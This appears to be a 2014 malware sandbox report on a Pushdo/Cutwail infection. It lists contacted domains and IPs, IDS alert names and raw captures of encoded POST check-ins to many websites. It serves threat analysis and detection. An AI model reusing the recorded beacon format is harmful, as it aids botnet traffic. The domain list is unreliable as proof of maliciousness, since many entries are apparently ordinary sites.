hxxp://mail57.us2.mcsv.net/	173.231.139.57
hxxp://buzzkillmedia.com/	173.201.140.128
hxxp://mailchimp.com/about/mcsv/	173.192.210.69
hxxp://tessera.co.jp/	210.150.6.88
hxxp://gcs-cpa.com/	64.14.68.37
hxxp://acmepacificrepairs.com/	69.198.129.78
hxxp://c21edu.com/	76.74.254.123
hxxp://thesergery.com/	202.47.95.44
hxxp://osouji-school.com/	211.13.204.89
hxxp://westhillsstl.org/	108.162.197.220
hxxp://starmedia.ca/	108.162.196.155
hxxp://doctsf.com/	213.186.33.97
hxxp://seobook.com/
hxxp://shakeyspizza.ph/	122.55.79.88
hxxp://bocr.cz/	217.198.113.104
hxxp://tobler-skele.bg/	164.138.219.128
hxxp://tokai-service.com/	157.7.170.103
hxxp://cefam-atlas.fr/	193.27.78.88
hxxp://schiedel.it/	217.145.99.26
hxxp://loteria1benifaio.com/	188.93.73.25
hxxp://discoveryplace.org/	72.52.221.192
hxxp://dithd.com/	216.177.135.4
hxxp://shinpd.com/	211.202.2.230
hxxp://maximilianeum.ch/	213.200.193.129
hxxp://thesyntheticfamily.com/	91.201.63.18
hxxp://harpersphoto.co.uk/	77.73.7.225
hxxp://proadec.com.br/	94.23.12.31
hxxp://golfpark-moossee.ch/	149.126.72.165
hxxp://calcitrusquality.org/	67.223.102.79
hxxp://differentimages.nl/	213.132.197.183
hxxp://polybeekindia.com/	112.78.124.166
hxxp://amberhotels.cz/	83.167.228.108
hxxp://gelpass.com/	94.125.164.238
hxxp://2wheelife.com/	204.74.219.83
hxxp://lockerlookz.com/	50.63.84.77
hxxp://namedecision.com/	195.246.231.195
hxxp://teasing-video.com/	162.159.247.204
hxxp://catholic-school-girls.com/	208.122.192.215
hxxp://forest43.ru/	91.218.228.111
hxxp://nox.sk/	80.87.208.167
hxxp://benefits-inc.com/	65.254.248.193
hxxp://welbilt-thailand.com/	202.170.120.80
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/B1BC968BD4F49D622AA89A81F2150152A41D829C.crt
hxxp://qistech.com/	181.224.139.27
hxxp://durandigitalmedia.com/	66.33.210.130
hxxp://aecnet.co.jp/	211.1.227.194
hxxp://garywollin.com/	206.176.241.122
hxxp://sugarfoote.com/	64.69.95.27
hxxp://bizeulimmobilier.com/	37.59.19.147
hxxp://siriusgt.com/	208.76.82.115
hxxp://maewang.com/	122.155.168.127
hxxp://dotnetpia.co.kr/	121.189.62.216
hxxp://doehrer.com/	46.4.100.186
hxxp://tsu-box.com/	119.245.179.7
hxxp://polishpotterydirect.com/	65.36.150.46
hxxp://simplysup1.com/	115.124.111.100
hxxp://kosovaere.com/	80.80.160.19
kioil.com	222.122.205.133
krenim.org	65.190.214.165
www.justconnect.co.za	5.9.122.172
sceram.com	62.244.84.23
www.photoclubs.com	209.50.251.101
matrax.bg	83.170.68.216
alc-mg.com	125.206.117.107
royalbotania.net	77.73.100.76
jivarogroup.com	74.63.154.193
gerard-alsacien.com	178.170.127.80
in1.smtp.messagingengine.com	66.111.4.73
www.traderush.com	199.83.128.93
m4m-usa.com	198.1.114.189
revocars.com	127.0.0.1
centrevillesettlement.com	216.117.172.203
jonglierkatakomben.com	85.214.56.196
www.myfilecenter.com	66.33.213.228
bandera-roja.com	213.177.193.241
barattare.net	62.149.128.166
celebikalip.com.tr	10.0.0.1
www.ctr4process.org	162.159.241.119
coe.pku.edu.cn	162.105.5.245
vitalur.by	178.159.246.76
johnnykimono.com	199.102.229.199
mxs.mail.ru	94.100.180.150
autohaus-repp.de	80.190.241.108
imaginehomessa.com	173.236.152.199
jeansmate.co.jp	211.1.230.105
printscharmingbc.ca	216.147.108.89
khl.org.uk	87.117.202.137
audio-direkt.net	127.0.0.1
mcvdberg.co.za	197.242.159.40
coplanar.seobook.com	207.97.249.100
pluginz.ru	89.108.108.60
lists.riseup.net	198.252.153.14
pisomania.com	89.248.100.138
lingewaelsche.com	31.200.209.162
cadbaz.com	213.186.33.87
gmail-smtp-in.l.google.com	173.194.76.26
adultlivechat.us	127.0.0.1
princetonhistory.org	66.201.98.71
edfmodel.com	103.14.141.42
luckygroup.biz	198.55.121.100
appliedspectra.com	173.247.250.120
alt4.gmail-smtp-in.l.google.com	173.194.69.26
ivcircus.ru	91.219.194.14
hartmultimedia.com	196.215.16.48
theanniversarycompany.com	67.23.255.58
torkair.com	66.7.204.43
arckepesajandek.hu	127.0.0.1
madmimi.com	216.180.230.174
aethora.com	67.207.143.253
atelier-enseignes.com	213.186.33.16
bureauriscos.com.br	189.113.2.106
www.bocr.cz	217.198.113.104
gomadagascar.com	64.62.163.238
www.download.windowsupdate.com	72.247.8.48
konishi-hp.com	122.219.254.148
lasgo.co.uk	195.177.192.15
madamlau.com	0.0.0.0
www.icigrain.com	199.91.125.58
szostka.com	127.0.0.1
mail7.digitalwaves.co.nz	127.0.0.1
teamboo.com	64.91.232.139
ks110.com	210.168.113.85
zeronet.co.jp	49.212.5.127
denno-insatsu.com	141.8.224.35
huntscombo.com	63.97.179.121
cabletech.co.za	92.52.122.202
www.bigjohnsbeefjerky.com	162.159.245.113
pyxis2.org	81.93.240.128
www.mibsga.com	74.124.214.210
www.solutioncorp.com	209.208.32.245
anemomylos.com	176.9.47.70
asterisk.com.sg	211.25.3.196
bonafidekrewe.com	209.235.255.87
destolfos.com	74.220.17.18
legalserver.org	67.202.93.52
dormfantasies.com	184.94.149.35
bestebproperties.com	216.14.125.49
ewapps.com	85.88.34.6
jigami.com	199.7.108.64
www.iaiglobal.or.id	49.50.8.93
bredainternet.nl	127.0.0.1
www.teknorhino.com	66.45.248.130
fujisangyo.com	203.137.44.163
www.saios.net	157.7.184.19
ifta.org	204.12.25.10
storci.com	88.149.156.78
www.biurimex.pl	89.161.181.123
ans-service.com	67.227.252.139
lapanthera.hu	195.56.148.119
smtp.live.com	65.55.162.200
alfaglass.ru	195.216.243.44
www.mattiussiecologia.com	95.110.203.75
trenpalau.com
fujino-lab.com
guberman.com.br
nichedictionary.com
meubles-jacquelin.com
felipegarrote.com
academiamc.com
hoyuu.com
isle-karnataka.org
bapasitaramsevatrust.org
x-cellcommunications.de
niray.com.cn
enzoyrodrigo.com.br

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET DNS DNS Query for Suspicious .com.cn Domain
ET TROJAN Backdoor.Win32.Pushdo.s Checkin
ET WEB_CLIENT Possible HTTP 403 XSS Attempt (External Source)
ET TROJAN Possible Compromised Host Sinkhole Cookie Value Snkz
ET POLICY Http Client Body contains pw= in cleartext
ET TROJAN Win32/Cutwail.BE Checkin 2
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 201

Traffic

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 504

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: nanfangcw.com

Connection: Keep-Alive

Cache-Control: no-cache

HP0OBb1gc6SaODwCdCpLAfbzlnLrzqDTQQ3ySiU8YaQzabbptfBhrwJQMX382R8Y

SNGmQixh3RqlYY4ctvx0Pek/pBRYQv14Uyb04 cBJZGz/vlTDk0ggaYLuxgmF5aA

NQ7nYe0N5QIBePBQj6SX1T6u7OnHubQK7VcFWxdFxIfzrHV/nCDGQ5LamX6VSuaP

dqnMWbeN3p5G79JBMcQhNRt7FYmlnYK3vmr9ARldoKjkv3OXW1W8M6IIQJSbyYMH

dOdSZ lFSFahxKPrwwaK7nYhTwaQmKemOh0kiG5EoZNMZxqrsYGlbkTWX0DDJELJ

hzL/2wT3GJi57JfDWAsMaf8CiAo8EaFZkhx23DF6RgukpihksZvHqrSLiJ1LKmGJ

Xza7jPoIREGSNsqZhw8VkF6HEN eZm2YW83kuU46L/JAiAme3KJ6uikznxpKpRUD

AI2rEmFqNNGAZWUpsx49petYG2jCO15Bb/Ps2MOV



...moveStyle:"right",.....mouseEvent:"mouseover",.....intervalTime:4,.
....titleBar:{titleBar_height:30,titleBar_bgColor:"#000000",titleBar_a
lpha:0},.....titleFont:{TitleFont_size:12,TitleFont_color:"#FFFFFF",Ti
tleFont_weight:"normal"},.....btn:{btn_bgColor:"#FFFFFF",btn_bgHoverCo
lor:"#cc0000",btn_fontColor:"#000000",btn_fontHoverColor:"#FFFFFF",btn
_borderColor:"#cccccc",btn_borderHoverColor:"#cc0000",btn_borderWidth:
1}...});..})..</script>..</head>..<body>...........&
lt;div class="top1" style="margin-top:-18px">......................
.. [<a href="reg.php">......</a>] [<a href="l
ogin.php">......</a>] <a href="news.php?sort=5">..
..........</a><img src="images/icon3.jpg" width="14" height="
21" align="absmiddle"/> | <a href="page.php?sort1=6"&g
t;............</a><img src="images/icon3.jpg" width="14" heig
ht="21" align="absmiddle"/> | <a href="Javascript:wind
ow.external.addFavorite(document.location.href,document.title)">...
.........</a><img src="images/icon3.jpg" width="14" height="2
1" align="absmiddle"/> | ...............400-003-2662</
div>..<div class="top2">..  <div class="logo"><img s
rc="images/logo.jpg" width="580" height="83" border="0" usemap="#Map" 
style="float:left;"/>..    <map name="Map" id="Map">..      &
lt;area shape="rect" coords="7,7,212,75" href="index.php" />..     
 <area shape="rect" coords="391,27,547,62" href="hXXp://nfcw.ta<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 219

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: dotnetpia.co.kr

Connection: Keep-Alive

Cache-Control: no-cache

....,...=[..N..._...px....3..6I...^...s..S...........p......./.. ...<...ML4...I.

_..it
q.............d......$...i#.....A'N 7.c"D..%...&w..(.h.*.-.-.../.. 1.JA3..V5..l7h.9...;.&.=?..?P..AaC.Cr..F...H.`,J..AL..WN.}lP...
HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=euc-kr

Server: Microsoft-IIS/7.0

Set-Cookie: ASP.NET_SessionId=ob025wlspo40ycyzbxo5ztlb; path=/; HttpOnly

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 12 Apr 2014 14:42:08 GMT

Content-Length: 21278
..<HTML>...<HEAD>....<meta http-equiv="Content-Type" co
ntent="text/html; charset=euc-kr">....<title>:: ............ 
........ :: ........ </title>......<link href="/StyleSheets/d
otnetpia.css" rel="stylesheet" type="text/css">....<script type=
"text/JavaScript" language="JavaScript" src="/Scripts/jquery.js">&l
t;/script>....<script type="text/JavaScript" language="JavaScrip
t" src="/Scripts/flash.js"></script>....<script type="text
/JavaScript" language="JavaScript" src="/Scripts/java_func.js"><
/script>....<script type="text/JavaScript" language="JavaScript"
 src="/Scripts/cstm_site.js"></script>....<script type="te
xt/JavaScript" language="JavaScript" src="/Scripts/DomainSearch.js">
;</script>....<script type="text/javascript">.....function
 onPageLoad() {..//....if (getCookie("pop_idc_move") != "done") {..//.
...    var prop = {..//....        top: 80,..//....        left: 150,.
.//....        width: 542,..//....        height: 657..//....    }..//
....    CreateLayerPopup("Notice/IdcMove/notice.htm", prop);..//....}.
.....rotate();..            }..            var nPopupCnt = 0;..       
     function CreateLayerPopup(FileName, Properties) {..              
  var oDiv = document.createElement('DIV');..                oDiv.setA
ttribute('id', 'divPopup_'   nPopupCnt);..                ..          
      var oIFrame = document.createElement('iFrame');..               
 oIFrame.setAttribute('id', 'iFramePopup_'   nPopupCnt);..        <<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 47

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: differentimages.nl

Connection: Keep-Alive

Cache-Control: no-cache

..L..R..w.....a.-...........KvB..@......\.W....
HTTP/1.1 302 Moved Permanently

Date: Sat, 12 Apr 2014 14:41:55 GMT

Server: Apache

location: hXXp://ww1.differentimages.nl

X-Powered-By: PleskLin

Content-Length: 0

Connection: close

Content-Type: text/html

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 550

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: victoria.com.pl

Connection: Keep-Alive

Cache-Control: no-cache

2jvc6ue0zZ/szE0Fli2E rCbpwZdL3dcC5/obErDRgTR5SLvyQmvN7aBSJ5F4yYe

cx o/Z2UOoDsqeL5DaGcIJXoNWJ82QLTNaSTnsWpnhnp4BSHLhQUMjsfIGId39BQ

b4OwI pGhVwCFAfB1mNCpA6nJgSpOXTgDRsRtERvRFmLrKA/EHDZqjwOO bu3qT0

gTxUtbhWYYmtZhMgmpoxT7t2Xal2XeERRAxEtqsxVoaha9eTVagPcoWHMISqrsu7

 Dc 8KAl/Ybww6H0QiRNHXsfy/URYRdAE32rxtZ3nAsAREsJ7/8c 3JGY9G3gXVV

uj/JFzYNKx4tg7fRS6Zd58r0eNIWLYPBllcTyuoJ7tVaHI L1aBPDGEW9JhvVk4Z

dfBau/5Z0TeKrCGlLncqoFlcqUw4oYIsJLjF7UvlYB8bA7Bz0lT/ 2tsHAjelhNF

E12ExFpUh6QlNeYDI4Vlp2Ak NIddmuN9H6ZtqyE7VL54oU20O7/goKkd3K/ BDd

UnZFisSdxRE27f135NI4


HTTP/1.1 403 Forbidden

Connection: close

Content-Length: 171

Content-Type: text/html

Date: Sat, 12 Apr 2014 14:40:16 GMT

Server: IdeaWebServer/v0.80
<HTML>.<HEAD>...<TITLE>403 Forbidden</TITLE>..
</HEAD>.<BODY BGCOLOR=#FFFFFF>...<H1>403 Forbidden&l
t;/H1>..You don't have permission to access this document...</BO
DY>.</HTML>...

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: VVV.teknorhino.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Sat, 12 Apr 2014 14:41:26 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.2.17
3d19..<script>document.write(unescape('"));..
</script>..<script type="text/javascript">..try {..var pag
eTracker = _gat._getTracker("UA-10809384-1");..pageTracker._trackP<<< skipped >>>

GET /sydney/ HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: VVV.optiver.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 12 Apr 2014 14:41:43 GMT

Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5

X-Powered-By: PHP/5.2.14

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html
274a..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="h
ttp://VVV.w3.org/1999/xhtml" xml:lang="en">..<head>....<ti
tle>Optiver Asia Pacific - A leading market making trading company&
lt;/title>.........<meta name="description" content="Optiver is 
a leading market maker in the field of proprietary an derivatives trad
ing." />.........<meta name="keywords" content="Optiver, optiver
, Asia, Pacific, Asia, Pacific, Sydney, sydney, Trading, trading, Mark
et making" />.<meta http-equiv="Content-Type" content="text/html
; charset=utf-8" />...<meta http-equiv="Cache-control" content="
public" />...<meta name="keywords" content="" />...<meta n
ame="description" content="" /> ...<meta http-equiv="X-UA-Compat
ible" content="IE=EmulateIE7" />...<base href="hXXp://VVV.optive
r.com/sydney/" />...<link rel="stylesheet" type="text/css" href=
"./inc/css/MyFontsWebfontsKit.css" />...<link rel="stylesheet" t
ype="text/css" href="./inc/css/screen.css" />...<!--[if IE]>.
...<link rel="stylesheet" type="text/css" href="loadcss/ie6" media=
"screen" />...<![endif]-->...<link href="inc/favicon.ico" 
rel="shortcut icon" type="image/x-icon" />...<script type="text/
javascript" src="./inc/js/mootools-1.2.3-core-yc.js"></script>
;...<script type="text/javascript" src="./inc/js/mootools-1.2.3.1-m
ore.js"></script>...<script type="text/javascript" src<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 558

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: bigjohnsbeefjerky.com

Connection: Keep-Alive

Cache-Control: no-cache

QgLM5hT S6HQfDu 79J6hGcWKnKMyKjKiOy8ZC 6MOXlEjsulE2O6Zrh1Aplg6Wk

AVSqK9/G U07TzZPN2T jpLwIXngsmU7IfhS1Gu9nXGWhsA5PyTki kPeJPnBEEJ

fvQc7QjEzWDZdMqu/WL7OHYmqkUJ0WITgnibGhc90Ot/OknOmr9m1 V6FIZGH2hv

Jp9sYC6vn17afejmF1 ClbHz/9NINu6ZLTLRqMTBEQs6Gq 3cody2t0XozUNdQi5

ruuOzCkQCtP7dQ6GcQgufI967ysvVQOfrNeVw6WstsVZRCH4ggsi/yIXCPudwIQd

dBwY1whDUpAlYGvi/GVdxfB0pt1MZNEaeOzt8iT9DwW99PCbt5gbuDdy43KT7u1j

l6ugpQ9FrXk4LYcWdGYRqrSWSAEAXBC6KgSykBI1EnJV9AJhcf85D vPf46JrSN5

vCXTM3SjmfKeznfvGq0hSBwEbNEt/pqAvfbQPpOv zMb1HrDYjeQZmuehqOMEsvt

brrjC7kyfKo1CDxfkxszU6Fa1ubA


HTTP/1.1 301 Moved Permanently

Server: cloudflare-nginx

Date: Sat, 12 Apr 2014 14:40:26 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d09eade82e09a5211bd069a69b61571511397313626760; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.bigjohnsbeefjerky.com; HttpOnly

Cf-Railgun: direct (starting new WAN connection)

Location: hXXp://VVV.bigjohnsbeefjerky.com/

CF-RAY: 11a02dd743dc0098-IAD
40d..<html>.<head><title>301 Moved Permanently</t
itle><script type="text/javascript">.//<![CDATA[.try{if (!
window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",ba
g2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=02fcfa4
f56/"},atok:"4cffc7936e86dea501d8c5bb9337a38d",petok:"f3b26fbef6f61559
1f688331a87db36cd2aa8a30-1397313626-1800",zone:"bigjohnsbeefjerky.com"
,rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"b4ed2853645ded89
0dad6285216c442f"}});!function(a,b){a=document.createElement("script")
,b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax
.cloudflare.com/cdn-cgi/nexp/dok9v=b064e16429/cloudflare.min.js",b.par
entNode.insertBefore(a,b)}()}}catch(e){};.//]]>.</script>.<
;/head>.<body bgcolor="white"><script type="text/javascrip
t">//<![CDATA[try{(function(a){var b="hXXp://",c="bigjohnsbeefje
rky.com",d="/cdn-cgi/cl/",e="img.gif",f=new a;f.src=[b,c,d,e].join("")
})(Image)}catch(e){}//]]></script>.<center><h1>30
1 Moved Permanently</h1></center>.<hr><center>
nginx</center>.</body>.</html>..1.....0..<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 534

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: lexjuridica.com

Connection: Keep-Alive

Cache-Control: no-cache

//EMnHHkPrP u6m2kJOutMqRpVWvPo39NQoj5CzK/MrrC/zmHxqmAPQo3KKyzaEX

XH8po8BJgOkKTwYSjOioFcxL2 NLNwi6LDLzfpf3LNxzWs5DNyp vJ8UdAHzOd3k

rPz6dOcNep7PMFeW35LlYT3rUSwmT6IB6H 1LjvIt1MYaTvxwOAhD3uuvqkMkX6M

Xi0/aLImf/wfj/ccieO4G235oDTeF5WBdjzO6tEyue9m96cYUg  NG2DXW Uva b

U4d5vdCOo yyGhldFdT/PinM Hgw3uZszvg aJ joDPys0Silr4RPWQwUoe ON6C

cSxDcYt3s/1gq cnpk5tzmbmLelHZvR9EVFGg4medX2F6OF/q33wtTEOHtRc5xQb

oz54Hu5HhCsS 8uSDmyNN9ln/tlBa7cHS4NTejJexPB gGUmeXgQVbfg2A69CKLb

/X gcHATdfINyfnLk5tKU/y9m/8Nacc9Df3L8MRzW/GTqjWjQmXaGwUI1Wrn7HXJ

ZA==


HTTP/1.1 200 OK

Date: Sat, 12 Apr 2014 14:41:49 GMT

Server: Apache

X-SERVER: 33

Last-Modified: Fri, 04 Oct 2013 22:24:11 GMT

ETag: "e130f2-f8b-4e7f1c2f7d8c0"

Accept-Ranges: bytes

Content-Length: 3979

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

<HTML><head>..<TITLE>LexJuridica, Información
 y Servicios Legales</TITLE> ..<meta name="description" conte
nt="Portal Jur.dico que le ofrece amplia informaci.n con la que poder 
resolver sus problemas legales, y otros servicios como consultas, legi
slaci.n contratos, foros, registros, abogados, dise.o y alojamiento we
b, etc.">..<meta name="keywords" content="Derecho, derecho, leye
s, ley, legal, legales, legislaci.n, legislacion, espa.a, espana, espa
.ol, espanol, abogados, actualizaciones jur.dicas, asesores, busqueda 
de abogados, contratos, formularios, formulario, documentos legales, s
panish law, boletin, boletines, registro, registros, registro mercanti
l, registro marcas, patentes, marcanet, infotel, asexor, propiedad int
electual, juristas, portal juridico, librer.a jur.dica, , judicial, le
trado, consultas, consultor, consultores, lexconsultor.es, lexconsulto
r, internet, foros, paginas web, webmaster, dise.o paginas web, diseno
, alojamiento, promoci.n, dominios, solicitud de dominios, laboral, se
guridad social, contratacion, bonificaciones, tramites, despidos, vaca
ciones, indemnizaciones por despido, prestacion desempleo, desempleo, 
transformaciones de contratos, recursos, aut.nomos, autonomos, cotizac
ion, jubilaci.n, jubilacion, incapacidad, invalidez, maternidad, reta,
 asistencia sanitaria, calendario laboral, salario, salarios, civil, f
amilia, donaciones, compraventa, compra-venta, usufructos, servidumbre
s, separacion, divorcio, nulidad, matrimonio, capitulaciones matri

<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 550

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: thesergery.com

Connection: Keep-Alive

Cache-Control: no-cache

vytw77Eu8LMiB60o0NiEoQqaXn/vZeQ9ddjOmkbUVYvVxQTr/1QI3fa WmAxyOyz

PXdgo0PnbObBG1DD8pyOiruC06zi6Q09G2BPYTfUPESENosXN1ANRILIr1socEag

KDMvLwxJ2KlfnQ0J5/c0uLL0jd9M0EMzvVyRuP8PsbpeqT84gy3CQ8t2AmW6zBSB

HdnBEm26QtZGZUIG8dVXSgsuRqc/94KJ6/Ln qPkXZzLxWzCb4gDuqQAW7fFiAtd

  enD6zF7A/LjSxLPb 3F9y0GEbyFALUAn1WIf5CbPIhAN1UUvkR qcat7FEQLtY

d69C4mh7KMxpr6QdL1N0IjEkqGbNBqBE6zFgPotPhIk4E3hB trfOZ2607QbXJA1

eG7zmkxlgC8Vz7CpESFhR8pwX7vZRts IW9UlqVx2HxgQozsJeZAxYAeUNyF9I4j

Odvj6CCC99mvb5cKaMGYdLKIdLzgGX9amkYrCI1bYJZpHATUa/124aq9OLLiIWD9

2X/KTJuEeN73WI5Hffk=


HTTP/1.0 400 Bad request: request method denied

Content-type: text/html; charset="utf-8"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html lang="en" xml:
lang="en" xmlns="hXXp://VVV.w3.org/1999/xhtml">..  <head>..  
  <title>Request denied by WatchGuard HTTP Proxy</title> .
.    <style type="text/css">..      body {..        font-family:
 Arial, Helvetica, Verdana, Sans-Serif;..        font-size: small;    
        ..        font-weight: normal;            ..        color: #00
0000;..      }..      div {            ..        margin-left: auto;   
         ..        margin-right: auto;            ..        text-align
: center;..      }..      .box {          ..        width: 600px;..   
     background-color: #F2F2F2;            ..        border-left: soli
d 1px #C2C2C2;            ..        border-right: solid 1px #C2C2C2;  
          ..        vertical-align: middle;..        padding: 20px 10p
x 20px 10px;..      }..      p {..        text-align: left;..      }..
      .red {..        font-weight: bold;..        color: Red;..       
 text-align: center;..      }..      .band {            ..        heig
ht: 20px;..        color: White;..        background: #333333;..      
  width: 600px;..        border-left: solid 1px #333333;..        bord
er-right: solid 1px #333333;..        padding: 3px 10px 0px 10px;..   
   }..      div#wrap {..        margin-top: 50px;..      }..    </s
tyle>..  </head>..  <body> ..    <div id="wrap">.
.      <div class="band"></div>..      <div class="<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: VVV.bocr.cz

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 12 Apr 2014 14:42:01 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.3-7 squeeze19

Set-Cookie: PHPSESSID=egubaa30odv4qq09os7mpkorj5; path=/; HttpOnly

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html; charset=utf-8
5828..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">.    <head>.        &l
t;meta http-equiv="Content-Type" content="text/html;charset=utf-8" /&g
t;.        <meta http-equiv="Content-language" content="cs" />..
                    <meta name="copyright" content="BOCR Trading s.
r.o." /> .        .                    <meta http-equiv="x-xrds-
location" content="hXXp://VVV.bocr.cz/xrds.xml" />.                
      ..        <title>BOCR kanalizace, odvodn..n.., vodovody<
;/title>..        <meta name="description" content="Kanalizace E
copal, Weholite. Dren....e Polidren, Drenosewer, Drenopal. ..achty kan
aliza..n.., vodom..rn.., ..erpac... J..mky, n..dr..e, septiky. ..OV" /
>.        <meta name="keywords" content="..achty,..erpac..,vodom
..rn..,dren....e,trubky,kanalizace,n..dr..e,j..mky, ecopal, weholite" 
/>.        <meta name="author" content="ZONER software, a.s." /&
gt;.        <meta name="template" content="ERIS" />    ....     
   .                    <meta name="google-site-verification" conte
nt="x2DKZEDN4HNXZ4BE04iD6kEPU-vowGp3B1F0gM5KPOU" />.        .      
              <link rel="shortcut icon" href="hXXp://VVV.bocr.cz/fa
vicon.ico" />.        .        .         .    .            <link
 href="/styl/1/" rel="stylesheet" type="text/css" media="screen,projec
tion" />.        .        <link href="/styl/2/" rel="stylesh<<< skipped >>>

POST / HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/octet-stream

Content-Length: 528

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: shipeliteexpress.com

Connection: Keep-Alive

Cache-Control: no-cache

kdNo pVr56Tn7iVGfMeZUo64VzqjDi9fmRGN ty8IKGS3ScLGWHLguV3DsFUXBJZ

8JJPbmDePk0e0GqMI/O6N49E8On1fwZzItgHi9Ht1cHDo5 JlAiB7/tb G0/E5n/

1qHSF yFb3Nc0c1KQqiSAwEqcqm/GGF9wVs18TwdDrHhL5gzvihEqjkzUdZGsQnC

SSJXRB/7fiVikXaIgZ7euUfs00pgu9YULzD9NLSGaVkCOWB7MeSsKoBaRscQeYrS

GAyEImylHYHQoJdaqiYl4IVPLvvySW 5O kcq3oT4o /SdXzfcdQDyMU5d4TxTV

oYa7xP03fvbcaqz3m6lY4iMvG0B46/aFx/ofy0Bld5 wdcyiBraQEW0EsCbO8EMP

0I01Jplm5G5LdJwMOO5yp3VAvnNA0ANP5yNZ03qiYKeDBT1uk10QR3UeL8FX4Pht

u5T9RhrJk5jVDdQ6vTCCi/Mjy7Wot49j4j3Z50j9xPIcNykqqqQnS9Qb0/saXgs=


HTTP/1.1 503 Service Temporarily Unavailable

Server: cloudflare-nginx

Date: Sat, 12 Apr 2014 14:40:45 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d82c29802f4da99df986786ea85b242221397313645850; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.shipeliteexpress.com; HttpOnly

Cache-Control: max-age=5

Expires: Sat, 12 Apr 2014 14:40:50 GMT

CF-RAY: 11a02e4e9a93087a-IAD
bf0..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &l
t;meta charset="UTF-8" />.  <meta http-equiv="Content-Type" cont
ent="text/html; charset=UTF-8" />.  <meta http-equiv="X-UA-Compa
tible" content="IE=Edge,chrome=1" />.  <meta name="robots" conte
nt="noindex, nofollow" />.  <meta name="viewport" content="width
=device-width, initial-scale=1, maximum-scale=1" />.  <title>
Just a moment...</title>.  <style type="text/css">.    htm
l, body {width: 100%; height: 100%; margin: 0; padding: 0;}.    body {
background-color: #ffffff; font-family: Helvetica, Arial, sans-serif; 
font-size: 100%;}.    h1 {font-size: 1.5em; color: #404040; text-align
: center;}.    p {font-size: 1em; color: #404040; text-align: center; 
margin: 10px 0 0 0;}.    #spinner {margin: 0 auto 30px auto; display: 
